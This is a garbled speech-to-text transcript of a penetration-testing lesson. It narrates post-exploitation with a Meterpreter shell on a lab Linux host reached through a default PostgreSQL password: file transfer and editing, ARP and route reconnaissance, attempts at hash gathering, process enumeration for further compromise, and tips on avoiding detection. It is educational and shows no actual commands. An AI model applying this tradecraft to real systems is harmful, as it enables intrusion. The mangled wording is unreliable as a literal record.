so again, back to some file system commands.
I can go to different directories.
I can get my working directory
show files that could make directors I can move files around. It could remove directories so most of your basic command shell functionalities, enabled interpreter itself.
I've also got networking commands.
So even though I already know the
I can certainly listed again,
right? 1 29 That's my remote system. That's menace plausible.
Maybe I want to do something else. Maybe I want to run
That's our end to look at mine
ports that are listening and maybe see some information about
that's that dash hands giving the same information.
what is What are my? What's my robbing people? What's in my art cash
right now, I've only been
connected to from the Cali instance, which is not 1 31
But if you were connecting to a system that was being used by lots of other people, just plain out cash is very useful because now I can see
other systems that are connected because their I P address and the Mac address are saved in this. In this cash,
this is our cash. I could look at route information.
baby. Six information is also available if I was interested in that.
So being able to, um, to poke around in the
in the file system is pretty handy. I can also do things like uploading and downloading files.
So, for instance, if I want to have to have the permission to read a file
so if I do l s in my current directory,
I can see that I've got, um, got some global,
globally readable files. It looks like so I can try to do something like download
And we can see that that actually worked.
And if this is a certificate file and we'll get into some of these things later and then that could be really useful. Now, where does this final go switch to my other command shell?
my Donald's directory
it's nowhere. When maybe it went to
So it did not go to my Donald's director. So goes to whatever director you launch your console from. And I was already in
route when I did that.
So I don't need this file. I'm gonna go ahead and delete it.
Control Paige up to switch back to my other tab. Remember your shortcuts.
So uploading downloading fouls. I can also edit a file.
It's gonna look like, uh, my certificates here.
This is probably my public cert.
So basically throws you into, like, a V I
which is very handy if you, you know, you don't want to have to pull a file back at the follow push it back out. That's that increases the odds of getting detected, right? So we wantto always think about
taking the action that's required in the way that
creates the minimum amount of
So other things to think about
I'm in my shell, my interpreter show I also have the ability to run
all kinds of post exploits.
by using the run command. There it is.
So executing the script, executing a post module, for instance, I might wantto see if I can
get hashed up from this system even though I know the Post Christ password. That's not the administrator password. I might have to, you know, do some other work in order to
I'll be able to, uh,
get the root password or some other valuable things.
tent have completion. Does not work in the context like this, unfortunately. So I have to know what I'm typing in, but I'm gonna try to run. Actually, is not a Windows system that will work.
Let me do this real quick
background this session
do a search for Post is gonna give me a lot of information.
I thought I might be able to find
post for Lennox. I scroll up here
Uh, looks like Lennox gather hashtag might be a good choice.
Go ahead and copy. That
might have been faster to do a search for hashtag itself.
That's a shorter list. I know. That's what I want to do. So now I can go through and I can find the one that I was interested in.
Okay, so now I'm gonna go back to
session one, which is the one that I may trip intercession is is enabled.
And what I can do is I can try to run this,
see if it actually works.
Oh, see, it doesn't work. I have to be rude in order for that, which makes sense. All right, so we're seeing some of the limitations of the kind of command show that you have. I have a interpreter shell, which is useful,
but it only lets me run
commands that the post GREss user account
is authorized to run.
And this traces us back to the idea of the principal at least privilege, right? I don't want to run Post Press as route
if I did that, and I'd also do not change the password on with some other vulnerability. Now, when I get it,
the application or compromised the command,
rather the credentials. If the Post Press i d. Has route type privileges now, I can do other powerful things that I wouldn't be able to do otherwise.
So there's good reasons for
respecting the principle of these privilege. You don't want to get
generous with doling out privileges when you're building a system for obvious reasons, I also might want thio, for instance, run
command to see what processes are running on that remote system. So I just did a P s command,
and it basically gives you full PS output.
And this way I can tell with some detail
what's actually running on that remote system
process. I d numbers, pair of process I. D. S. The name and any paths that are relevant would all be shown here.
I notice I've got a bunch of things running. I've got
some applications dissed CCD, her brother just cc the demon for that.
I've got an Apache Web server running.
Got some ruby components running.
So a lot of things looks like I've got V N C running. So there's a lot of clues I've just uncovered for how I might go about
further compromising this system.
And I haven't even done a scan yet. I just happened to
to take a guess that the post grass database
would have a default password, and it does. So I'm able to get in and get all of this. This information,
let's run our health care and one more time,
other things we can do. I showed a few things, you know, like running a shell PS command. I can kill the process. If I have permission to do so, I can execute commands.
I can't even set up port forwarding, which might be useful depending on your
you're you're needs at the time.
And there's some other options I'm, uh, looking at for, like, encoding setting time outs,
There are ways to try to get a picture from the Webcam.
I don't see that option in this context,
but other things to think about, I can suspend a process. I can also
run Assist Info Command to give me a concise output. Kind of like a you named Ash a command would do on a UNIX system.
Give me some good details here
For what? I would be
other other details. I want to track for this remote system to know that I've got
something truly useful.
All right, so we'll definitely explore more features of the interpreter shell as we go through some of the demonstrations. But this is a good introduction. Alright, See, in the next video